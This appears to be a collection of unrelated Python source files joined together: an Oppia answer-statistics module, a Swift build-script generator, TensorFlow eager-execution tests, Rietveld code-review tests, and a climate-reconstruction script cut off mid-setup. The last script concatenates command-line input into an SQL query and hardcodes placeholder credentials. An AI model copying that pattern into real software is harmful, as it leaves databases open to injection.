category: answer_frequency_list.to_raw_type()
for category, answer_frequency_list in (
self.categorized_answer_freq_lists.iteritems())
}
@classmethod
def from_raw_type(cls, categorized_frequency_dict):
"""Returns the domain object for categorized answer frequency dict for
a given dict.
Args:
categorized_frequency_dict: dict. The categorized answer frequency
dict whose keys are category names and whose corresponding
values are lists of answer frequency dicts. Each answer
frequency dict has the following keys and values:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
CategorizedAnswerFrequencyLists. The domain object for categorized
answer frequency dict.
"""
return cls({
category: AnswerFrequencyList.from_raw_type(answer_occurrence_list)
for category, answer_occurrence_list in (
categorized_frequency_dict.iteritems())
})
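# Illustrative round-trip for the calculation-output containers above (the
# category name and answer values are hypothetical):
#
#     freq_lists = CategorizedAnswerFrequencyLists.from_raw_type({
#         'Top answers': [{'answer': 'cat', 'frequency': 3}],
#     })
#     freq_lists.to_raw_type()
#     # => {'Top answers': [{'answer': 'cat', 'frequency': 3}]}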
class StateAnswersCalcOutput(object):
"""Domain object that represents output of calculations operating on
state answers.
"""
def __init__(
self, exploration_id, exploration_version, state_name,
interaction_id, calculation_id, calculation_output):
"""Initialize domain object for state answers calculation output.
Args:
exploration_id: str. The ID of the exploration corresponding to the
answer calculation output.
exploration_version: int. The version of the exploration
corresponding to the answer calculation output.
state_name: str. The name of the exploration state to which the
aggregated answers were submitted.
interaction_id: str. The ID of the interaction.
calculation_id: str. Which calculation was performed on the given
answer data.
calculation_output: AnswerCalculationOutput. The output of an
answer aggregation operation.
"""
self.exploration_id = exploration_id
self.exploration_version = exploration_version
self.state_name = state_name
self.calculation_id = calculation_id
self.interaction_id = interaction_id
self.calculation_output = calculation_output
def save(self):
"""Validate the domain object and commit it to storage."""
self.validate()
stats_models.StateAnswersCalcOutputModel.create_or_update(
self.exploration_id, self.exploration_version, self.state_name,
self.interaction_id, self.calculation_id,
self.calculation_output.calculation_output_type,
self.calculation_output.to_raw_type())
def validate(self):
"""Validates StateAnswersCalcOutputModel domain object entity before
it is commited to storage.
"""
# There is a danger of data overflow if answer_opts exceeds 1MB. This
# will be addressed later if it happens regularly. At the moment, a
# ValidationError is raised if an answer exceeds the maximum size.
max_bytes_per_calc_output_data = 999999
if not isinstance(self.exploration_id, basestring):
raise utils.ValidationError(
'Expected exploration_id to be a string, received %s' % str(
self.exploration_id))
if not isinstance(self.state_name, basestring):
raise utils.ValidationError(
'Expected state_name to be a string, received %s' % str(
self.state_name))
if not isinstance(self.calculation_id, basestring):
raise utils.ValidationError(
'Expected calculation_id to be a string, received %s' % str(
self.calculation_id))
if (not isinstance(self.calculation_output, AnswerFrequencyList)
and not isinstance(
self.calculation_output, CategorizedAnswerFrequencyLists)):
raise utils.ValidationError(
'Expected calculation output to be one of AnswerFrequencyList '
'or CategorizedAnswerFrequencyLists, encountered: %s' % (
self.calculation_output))
output_data = self.calculation_output.to_raw_type()
if sys.getsizeof(output_data) > max_bytes_per_calc_output_data:
# TODO(msl): find a better way to deal with big
# calculation output data, e.g. just skip. At the moment,
# too long answers produce a ValidationError.
raise utils.ValidationError(
'calculation_output is too big to be stored (size: %d): %s' % (
sys.getsizeof(output_data), str(output_data)))
|
|
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2015 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
from .config import Configuration
import os
class Script:
products = []
workspaces = []
extra = ""
def __init__(self):
pass
def add_product(self, product):
self.workspaces = None
self.products.append(product)
def add_workspace(self, workspace):
self.products = None
self.workspaces.append(workspace)
def add_text(self, text):
self.extra += text + "\n\n"
def generate_products(self):
variables = ""
for key, val in Configuration.current.variables.items():
variables += key + "=" + val
variables += "\n"
verbose_flags = """
VERBOSE_FLAGS = """
if Configuration.current.verbose:
verbose_flags += "-v"
verbose_flags += "\n"
swift_triple = Configuration.current.target.swift_triple
base_flags = """
TARGET = """ + Configuration.current.target.triple + """
DSTROOT = """ + Configuration.current.install_directory.absolute() + """
"""
if swift_triple is not None:
base_flags += """
SWIFT_TARGET = """ + Configuration.current.target.swift_triple + """
SWIFT_ARCH = """ + Configuration.current.target.swift_arch + """
"""
base_flags += """
MODULE_CACHE_PATH = """ + Configuration.current.module_cache_directory.relative() + """
BUILD_DIR = """ + Configuration.current.build_directory.relative() + """
INTERMEDIATE_DIR = """ + Configuration.current.intermediate_directory.relative() + """
CLANG = """ + Configuration.current.clang + """
CLANGXX = """ + Configuration.current.clangxx + """
SWIFT = """ + Configuration.current.swift + """
SWIFTC = """ + Configuration.current.swiftc + """
SDKROOT = """ + Configuration.current.swift_sdk + """
AR = """ + Configuration.current.ar + """
OS = """ + Configuration.current.target.swift_sdk_name + """
ARCH = """ + Configuration.current.target.swift_arch + """
DYLIB_PREFIX = """ + Configuration.current.target.dynamic_library_prefix + """
DYLIB_SUFFIX = """ + Configuration.current.target.dynamic_library_suffix + """
PREFIX = """ + Configuration.current.prefix + """
"""
if Configuration.current.requires_pkg_config:
base_flags += """
PKG_CONFIG = """ + Configuration.current.pkg_config + """
"""
if Configuration.current.system_root is not None:
base_flags += """
SYSROOT = """ + Configuration.current.system_root.absolute() + """
"""
base_flags += """
SRCROOT = """ + Configuration.current.source_root.relative() + """
BINUTILS_VERSION = 4.8
TARGET_LDSYSROOT =
"""
if Configuration.current.bootstrap_directory is not None:
base_flags += """
BOOTSTRAP_DIR = """ + Configuration.current.bootstrap_directory.relative() + """/common
TARGET_BOOTSTRAP_DIR = """ + Configuration.current.bootstrap_directory.relative() + """/${TARGET}
"""
c_flags = """
TARGET_CFLAGS = -fcolor-diagnostics -fdollars-in-identifiers -fblocks -fobjc-runtime=macosx-10.11 -fintegrated-as -fPIC --target=${TARGET} """
if Configuration.current.build_mode == Configuration.Debug:
c_flags += "-g -O0 "
elif Configuration.current.build_mode == Configuration.Release:
c_flags += "-O2 "
if Configuration.current.system_root is not None:
c_flags += "--sysroot=${SYSROOT}"
if Configuration.current.bootstrap_directory is not None:
c_flags += """ -I${BOOTSTRAP_DIR}/usr/include -I${BOOTSTRAP_DIR}/usr/local/include """
c_flags += """ -I${TARGET_BOOTSTRAP_DIR}/usr/include -I${TARGET_BOOTSTRAP_DIR}/usr/local/include """
c_flags += Configuration.current.extra_c_flags
swift_flags = "\nTARGET_SWIFTCFLAGS = -I${SDKROOT}/lib/swift/" + Configuration.current.target.swift_sdk_name + " -Xcc -fblocks -resource-dir ${SDKROOT}/lib/swift "
if swift_triple is not None:
swift_flags += "-target ${SWIFT_TARGET} "
if Configuration.current.system_root is not None:
swift_flags += "-sdk ${SYSROOT} "
if Configuration.current.bootstrap_directory is not None:
swift_flags += """ -I${BOOTSTRAP_DIR}/usr/include -I${BOOTSTRAP_DIR}/usr/local/include """
swift_flags += """ -I${TARGET_BOOTSTRAP_DIR}/usr/include -I${TARGET_BOOTSTRAP_DIR}/usr/local/include """
if Configuration.current.build_mode == Configuration.Debug:
swift_flags += "-g -Onone "
elif Configuration.current.build_mode == Configuration.Release:
swift_flags += "-O "
swift_flags += Configuration.current.extra_swift_flags
swift_flags += """
TARGET_SWIFTEXE_FLAGS = -I${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ -L${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ """
if Configuration.current.build_mode == Configuration.Debug:
swift_flags += "-g -Onone -enable-testing "
elif Configuration.current.build_mode == Configuration.Release:
swift_flags += " "
swift_flags += Configuration.current.extra_swift_flags
ld_flags = """
EXTRA_LD_FLAGS = """ + Configuration.current.extra_ld_flags
ld_flags += """
TARGET_LDFLAGS = --target=${TARGET} ${EXTRA_LD_FLAGS} -L${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ """
if Configuration.current.system_root is not None:
ld_flags += "--sysroot=${SYSROOT}"
if Configuration.current.bootstrap_directory is not None:
ld_flags += """ -L${TARGET_BOOTSTRAP_DIR}/usr/lib"""
if Configuration.current.linker is not None:
ld_flags += " -fuse-ld=" + Configuration.current.linker
if Configuration.current.toolchain is not None:
bin_dir = Configuration.current.toolchain
if not os.path.exists(bin_dir.path_by_appending("ld").relative()):
bin_dir = Configuration.current.toolchain.path_by_appending("bin")
c_flags += " -B" + bin_dir.relative()
ld_flags += " -B" + bin_dir.relative()
c_flags += "\n"
swift_flags += "\n"
ld_flags += "\n"
cxx_flags = """
TARGET_CXXFLAGS = -std=gnu++11 -I${SYSROOT}/usr/include/c++/${BINUTILS_VERSION} -I${SYSROOT}/usr/include/${TARGET}/c++/${BINUTILS_VERSION}
"""
ar_flags = """
AR_FLAGS = rcs
"""
flags = variables + verbose_flags + base_flags + c_flags + swift_flags + cxx_flags + ld_flags + ar_flags
cp_command = """
rule Cp
command = mkdir -p `dirname $out`; /bin/cp -r $in $out
description = Cp $in
"""
compilec_command = """
rule CompileC
command = mkdir -p `dirname $out`; ${CLANG} ${TARGET_CFLAGS} $flags ${VERBOSE_FLAGS} -c $in -o $out
description = CompileC: $in
rule CompileCxx
command = mkdir -p `dirname $out`; ${CLANGXX} ${TARGET_CFLAGS} ${TARGET_CXXFLAGS} $flags ${VERBOSE_FLAGS} -c $in -o $out
description = CompileCxx: $in
"""
swiftc_command = """
rule CompileSwift
command = mkdir -p `dirname $out`; mkdir -p ${MODULE_CACHE_PATH}; ${SWIFT} -frontend -c $module_sources ${TARGET_SWIFTCFLAGS} $flags -module-name $module_name -module-link-name $module_name -o $out -emit-module-path $out.~partial.swiftmodule -emit-module-doc-path $out.~partial.swiftdoc -emit-dependencies-path $out.d -emit-reference-dependencies-path $out.swiftdeps -module-cache-path ${MODULE_CACHE_PATH}
description = CompileSwift: $in
depfile = $out.d
rule MergeSwiftModule
command = mkdir -p `dirname $out`; ${SWIFT} -frontend -emit-module $partials ${TARGET_SWIFTCFLAGS} $flags -module-cache-path ${MODULE_CACHE_PATH} -module-link-name $module_name -o $out
description = Merge $out
"""
assembler_command = """
rule Assemble
command = mkdir -p `dirname $out`; ${CLANG} -x assembler-with-cpp -c $in -o $out ${TARGET_CFLAGS} $flags ${VERBOSE_FLAGS}
description = Assemble: $in
"""
link_command = """
rule Link
command = mkdir -p `dirname $out`; ${CLANG} ${TARGET_LDFLAGS} $flags ${VERBOSE_FLAGS} $start $in $end -o $out"""
if Configuration.current.verbose:
link_command += "-Xlinker --verbose"
link_command += """
description = Link: $out
rule Archive
command = mkdir -p `dirname $out`; ${AR} ${AR_FLAGS} $flags $out $in
description = Archive: $out
"""
swift_build_command = """
rule SwiftExecutable
command = mkdir -p `dirname $out`; ${SWIFTC} ${TARGET_SWIFTEXE_FLAGS} ${EXTRA_LD_FLAGS} $flags $in -o $out
description = SwiftExecutable: $out
"""
commands = cp_command + compilec_command + swiftc_command + assembler_command + link_command + swift_build_command
script = flags + commands
for product in self.products:
script += product.generate()
script += """
rule RunReconfigure
command = ./configure --reconfigure
description = Reconfiguring build script.
build ${BUILD_DIR}/.reconfigure: RunReconfigure
build reconfigure: phony | ${BUILD_DIR}/.reconfigure
"""
script += self.extra
script += "\n\n"
return script
def generate_workspaces(self):
build_project_command = """
rule BuildProject
command = pushd $project; ninja; popd
"""
script = build_project_command
for workspace in self.workspaces:
script += workspace.generate()
script += "\n\n"
return script
def generate(self):
script = None
if self.workspaces is None:
script = self.generate_products()
script_file = open(Configuration.current.build_script_path.absolute(), 'w')
script_file.write(script)
script_file.close()
else:
for workspace in self.workspaces:
workspace.configure()
script = self.generate_workspaces()
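# A rough usage sketch (illustrative only; assumes Configuration.current has
# already been populated by the configure step and that `product` implements
# generate()):
#
#     script = Script()
#     script.add_product(product)       # product mode clears self.workspaces
#     script.add_text("build all: phony")   # appended verbatim to the output
#     script.generate()   # writes the ninja build script to
#                         # Configuration.current.build_script_path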
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for low-level eager execution primitives."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import tape
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
class Tests(test.TestCase):
def setUp(self):
# Force-load `distribution_strategy_context` to prevent GC at
# test time. See discussion in cl//219478951.
tape.distribution_strategy_context.get_distribution_strategy()
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MatMulCorrectResponse(self):
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
a_100_by_784 = random_ops.random_uniform((100, 784))
b_100_by_784 = random_ops.random_uniform((100, 784))
ctx = context.context()
self.assertAllClose(
math_ops.matmul(a_2_by_2, b_2_by_2),
pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2,
b_2_by_2, "transpose_a", False, "transpose_b", False))
self.assertAllClose(
math_ops.matmul(a_100_by_784, b_100_by_784, transpose_b=True),
pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_100_by_784,
b_100_by_784, "transpose_a", False, "transpose_b", True))
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_ResourceVariableMatMulCorrectResponse(self):
ctx = context.context()
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
m = resource_variable_ops.ResourceVariable(a_2_by_2)
x = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m, "transpose_a",
False, "transpose_b", False)
y = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2, a_2_by_2,
"transpose_a", False, "transpose_b", False)
self.assertAllEqual(x, y)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MixedPrecisionVariableMatMulCorrectResponse(self):
ctx = context.context()
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
a_2_by_2_fp16 = math_ops.cast(a_2_by_2, dtype=dtypes.float16)
m = resource_variable_ops.ResourceVariable(a_2_by_2)
m = resource_variable_ops._MixedPrecisionVariable(
m, read_dtype=dtypes.float16)
x = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m, "transpose_a",
False, "transpose_b", False)
y = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2_fp16,
a_2_by_2_fp16, "transpose_a", False, "transpose_b", False)
self.assertEqual(x.dtype, dtypes.float16)
self.assertAllEqual(x, y)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_TapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
tape.watch(a_2_by_2)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2,
a_2_by_2, "transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [a_2_by_2])[0]
self.assertAllEqual(dz_dy.numpy(),
constant_op.constant(4.0, shape=[2, 2]).numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_ResourceVariableTapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
m = resource_variable_ops.ResourceVariable(a_2_by_2)
tape.watch(m)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m,
"transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [m])[0]
self.assertAllEqual(dz_dy.numpy(),
constant_op.constant(4.0, shape=[2, 2]).numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MixedPrecisionVariableTapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant([[1.0, 2.0], [3.0, 4.0]],
dtype=dtypes.float32)
a_2_by_2_fp16 = math_ops.cast(a_2_by_2, dtype=dtypes.float16)
m1 = resource_variable_ops.ResourceVariable(a_2_by_2)
m2 = resource_variable_ops._MixedPrecisionVariable(
m1, read_dtype=dtypes.float16)
tape.watch(m2)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2_fp16, m2,
"transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [m2])[0]
self.assertEqual(dz_dy.dtype, dtypes.float16)
expected_grads = math_ops.matmul(
array_ops.transpose(a_2_by_2_fp16),
constant_op.constant(1., shape=[2, 2], dtype=dtypes.float16)).numpy()
self.assertAllEqual(dz_dy.numpy(), expected_grads)
# Tests homogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_AddNCorrectResponse(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
self.assertAllClose(
math_ops.add_n([a_2_by_2, b_2_by_2]),
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx._handle, ctx.device_name,
"AddN", None, None,
[a_2_by_2, b_2_by_2]))
# Tests homogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_AddNTapeWrite(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
with backprop.GradientTape(persistent=True) as tape:
tape.watch(a_2_by_2)
tape.watch(b_2_by_2)
z1 = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "AddN", None, None,
[a_2_by_2, b_2_by_2])
z2 = math_ops.add_n([a_2_by_2, b_2_by_2])
dz1_dy = tape.gradient(z1, [a_2_by_2])[0]
dz2_dy = tape.gradient(z2, [a_2_by_2])[0]
self.assertAllEqual(dz1_dy.numpy(), dz2_dy.numpy())
# Tests heterogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_IdentityNCorrectResponse(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
self.assertAllClose(
array_ops.identity_n([a_2_by_2, b_2_by_2]),
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx._handle, ctx.device_name,
"IdentityN", None, None,
[a_2_by_2, b_2_by_2]))
# Tests heterogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_IdentityNTapeWrite(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
with backprop.GradientTape(persistent=True) as tape:
tape.watch(a_2_by_2)
tape.watch(b_2_by_2)
z1 = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "IdentityN", None, None,
[a_2_by_2, b_2_by_2])
z2 = array_ops.identity_n([a_2_by_2, b_2_by_2])
dz1_dy = tape.gradient(z1[0], [a_2_by_2])[0]
dz2_dy = tape.gradient(z2[0], [a_2_by_2])[0]
self.assertAllEqual(dz1_dy.numpy(), dz2_dy.numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_InvalidInputs(self):
a_2_by_2 = random_ops.random_uniform((2, 2))
ctx = context.context()
assert ctx.executing_eagerly(
), "The prototype doesn't contain C code for graph construction"
ctx_handle = ctx._handle # pylint: disable=protected-access
# Not enough base params
with self.assertRaisesRegexp(ValueError,
"at least 5 items in the input tuple"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
"Identity")
# Not enough inputs
with self.assertRaisesRegexp(ValueError,
"Expected to be at least 6, was 5"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx_handle,
"Identity", None, [])
# Bad type
with self.assertRaisesRegexp(TypeError, "expected a string for op_name"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
ctx_handle, None, [], a_2_by_2)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastPathExecute_InvalidAttributes(self):
split_dim = constant_op.constant(0, dtype=dtypes.int32)
value = constant_op.constant([0, 1, 2, 3], dtype=dtypes.float32)
ctx = context.context()
ctx_handle = ctx._handle
with self.assertRaises(core._FallbackException):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
"Split", None, None, split_dim,
value, "num_split", -1)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testInvalidNumOutputs(self):
with self.assertRaisesRegexp(
Exception,
"Value for attr 'num_split' of -1 must be at least minimum 1"):
array_ops.split(value=[1, 2, 3], num_or_size_splits=-1)
if __name__ == "__main__":
test.main()
|
|
#!/usr/bin/env python
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for view functions and helpers."""
import datetime
import json
import unittest
import setup
setup.process_args()
from django.http import HttpRequest
from google.appengine.api.users import User
from google.appengine.ext import ndb
from utils import TestCase, load_file
from codereview import models, views
from codereview import engine # engine must be imported after models :(
class MockRequest(HttpRequest):
"""Mock request class for testing."""
def __init__(self, user=None, issue=None):
super(MockRequest, self).__init__()
self.META['HTTP_HOST'] = 'testserver'
self.user = user
self.issue = issue
class TestPublish(TestCase):
"""Test publish functions."""
def setUp(self):
super(TestPublish, self).setUp()
self.user = User('[email protected]')
self.login('[email protected]')
self.issue = models.Issue(subject='test')
self.issue.local_base = False
self.issue.put()
self.ps = models.PatchSet(parent=self.issue.key, issue_key=self.issue.key)
self.ps.data = load_file('ps1.diff')
self.ps.put()
self.patches = engine.ParsePatchSet(self.ps)
ndb.put_multi(self.patches)
def test_draft_details_no_base_file(self):
request = MockRequest(User('[email protected]'), issue=self.issue)
# add a comment and render
cmt1 = models.Comment(
patch_key=self.patches[0].key, parent=self.patches[0].key)
cmt1.text = 'test comment'
cmt1.lineno = 1
cmt1.left = False
cmt1.draft = True
cmt1.author = self.user
cmt1.put()
# Add a second comment
cmt2 = models.Comment(
patch_key=self.patches[1].key, parent=self.patches[1].key)
cmt2.text = 'test comment 2'
cmt2.lineno = 2
cmt2.left = False
cmt2.draft = True
cmt2.author = self.user
cmt2.put()
# Add fake content
content1 = models.Content(text="foo\nbar\nbaz\nline\n")
content1.put()
content2 = models.Content(text="foo\nbar\nbaz\nline\n")
content2.put()
cmt1_patch = cmt1.patch_key.get()
cmt1_patch.content_key = content1.key
cmt1_patch.put()
cmt2_patch = cmt2.patch_key.get()
cmt2_patch.content_key = content2.key
cmt2_patch.put()
# Mock the get-content calls. The first fails with a FetchError,
# the second succeeds (see issue384).
def raise_err():
raise models.FetchError()
cmt1.patch_key.get().get_content = raise_err
cmt2.patch_key.get().get_patched_content = lambda: content2
_, comments = views._get_draft_comments(request, self.issue)
self.assertEqual(len(comments), 2)
# Try to render draft details using the patched Comment
# instances from here.
views._get_draft_details(request, [cmt1, cmt2])
class TestSearch(TestCase):
def setUp(self):
"""Create two test issues and users."""
super(TestSearch, self).setUp()
user = User('[email protected]')
models.Account.get_account_for_user(user)
user = User('[email protected]')
models.Account.get_account_for_user(user)
self.user = User('[email protected]')
self.login('[email protected]')
issue1 = models.Issue(subject='test')
issue1.reviewers = ['[email protected]',
'[email protected]']
issue1.local_base = False
issue1.put()
issue2 = models.Issue(subject='test')
issue2.reviewers = ['[email protected]',
'[email protected]']
issue2.local_base = False
issue2.put()
def test_json_get_api(self):
today = datetime.date.today()
start = datetime.datetime(today.year, today.month, 1)
next_month = today + datetime.timedelta(days=31)
end = datetime.datetime(next_month.year, next_month.month, 1)
# This search is derived from a real query that comes up in the logs
# quite regularly. It searches for open issues with a test group as
# reviewer within a month and requests the returned data to be encoded
# as JSON.
response = self.client.get('/search', {
'closed': 3, 'reviewer': '[email protected]',
'private': 1, 'created_before': str(end),
'created_after': str(start), 'order': 'created',
'keys_only': False, 'with_messages': False, 'cursor': '',
'limit': 1000, 'format': 'json'
})
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'],
'application/json; charset=utf-8')
payload = json.loads(response.content)
self.assertEqual(len(payload['results']), 1)
class TestModifierCount(TestCase):
"""Test modifier counts for the latest patchset."""
def line_count(self, lines):
if lines == 1:
return ''
return ",%d", lines
def makePatch(self, add_lines, remove_lines):
patch = (
"Index: cc/layers/layer.cc\n"
"==============================="
"====================================\n"
"--- a/cc/layers/layer.cc\n"
"+++ b/cc/layers/layer.cc\n"
"@@ -905%s +904%s @@"
" void Layer::PushPropertiesTo(LayerImpl* layer) {\n") % (
(self.line_count(add_lines),
self.line_count(remove_lines)))
for _ in xrange(remove_lines):
patch += "-base::Passed(&original_request)));\n"
for _ in xrange(add_lines):
patch += "+base::Passed(&new_request)));\n"
return patch
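# For example, makePatch(5, 7) produces a single hunk whose header reads
# "@@ -905,5 +904,7 @@ void Layer::PushPropertiesTo(LayerImpl* layer) {",
# followed by 7 removed ("-") lines and 5 added ("+") lines; test_both_patch
# below expects views._get_modified_counts() to report 5 added and 7 removed
# for such a patch set.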
def setUp(self):
super(TestModifierCount, self).setUp()
self.user = User('[email protected]')
self.login('[email protected]')
def test_empty_patch(self):
issue = models.Issue(subject="test with 0 lines")
issue.local_base = False
issue.put()
added, removed = views._get_modified_counts(issue)
self.assertEqual(0, added)
self.assertEqual(0, removed)
def test_add_patch(self):
issue = models.Issue(subject="test with 1 line removed")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(1, 0)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(1, added)
self.assertEqual(0, removed)
def test_remove_patch(self):
issue = models.Issue(subject="test with 1 line removed")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(0, 1)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(0, added)
self.assertEqual(1, removed)
def test_both_patch(self):
issue = models.Issue(subject="test with changes")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(5, 7)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(5, added)
self.assertEqual(7, removed)
if __name__ == '__main__':
unittest.main()
|
|
#!/bin/python
# -*- coding: utf-8 -*-
"""
Reconstructs temperature fields from the regression data of the selected index fields stored in the database.
TODO: Work in progress! Add try/except error handling and replace the hardcoded grid dimensions (81, 161).
Created on Mon May 11 23:00:15 2015
@author: Manuel Beck
"""
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# LIBRARIES:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
import numpy as np
import h5py
from sklearn.preprocessing import scale
import psycopg2
import sys
import os
# debug show full numpy array
np.set_printoptions(threshold='nan')
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# FUNCTIONS:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# import postgres interaction functions
from postgresInt import sendDbQuery, getPgData, getPgRast, geotiff2psql
# import regmod statistic functions and main reconstruct function
from pcaStats import pca, mlr, reconstruct
# import numpy 2 geotiff converting function
from np2geotiff import numpy2geotiff
# import command line arguments validator
from argvValidate import validateArgv
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# CONFIGURATION:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# path and name of hdf5 cru maps file
hdf5PATH = '/CRU/mSelInCol_'
# db credentials
dbHost = "localhost"
dbName = "myDBName"
dbUser = "myUser"
dbPass = "myPassword"
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# RUN:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# validate user input
validateArgv(sys.argv[1:])
# define db connection string
conn = psycopg2.connect("host="+dbHost+" dbname="+dbName+" user="+dbUser+" password="+dbPass)
# get command line arguments
year = sys.argv[1]
month = sys.argv[2]
evIdsList = [int(arg) for arg in sys.argv[3:]]
evIdsStr = ", ".join(sys.argv[3:])
# get mean std map for month
query = "Select ST_DUMPVALUES(rast) From temperature_cru_std WHERE month = " + str(month) + ";"
